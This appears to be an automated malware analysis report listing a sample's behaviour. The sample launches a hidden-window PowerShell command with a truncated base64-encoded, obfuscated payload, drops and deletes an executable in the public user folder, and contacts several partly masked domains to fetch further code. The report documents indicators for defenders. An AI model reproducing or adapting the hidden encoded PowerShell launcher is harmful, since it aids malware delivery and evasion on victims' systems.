Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACgAIAAkAFMAaABlAEwATABpAEQAWwAxAF0AKwAkAFMAaABFAGwATABJAGQAWwAxADMAXQArACcAeAAnACkAKAAgACgAKAAiAHsANAA5AH0AewA5ADMAfQB7ADUAfQB7ADEAMAA5AH0AewA4ADYAfQB7ADMANgB9AHsANA...
Modifies file system
Creates the following files
- C:\users\public\44739.exe
Deletes the following files
- C:\users\public\44739.exe
Network activity
TCP
HTTP GET requests
- http://gi##a.jp/9wBp2v8c/
- http://tr##dic.com/HZToLm/
- http://on###hild.org/Z3QNxOMmX2/
- http://on###hild.org/cgi-sys/suspendedpage.cgi
- http://he###ling.net/v6jtVz0i/
UDP
- DNS ASK gi##a.jp
- DNS ASK tr##dic.com
- DNS ASK on###hild.org
- DNS ASK fr####is-rommens.fr
- DNS ASK he###ling.net
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACgAIAAkAFMAaABlAEwATABpAEQAWwAxAF0AKwAkAFMAaABFAGwATABJAGQAWwAxADMAXQArACcAeAAnACkAKAAgACgAKAAiAHsANAA5AH0AewA5ADMAfQB7ADUAfQB7ADEAMAA5AH0AewA4ADYAfQB7ADMANgB9AHsANA...' (with hidden window)
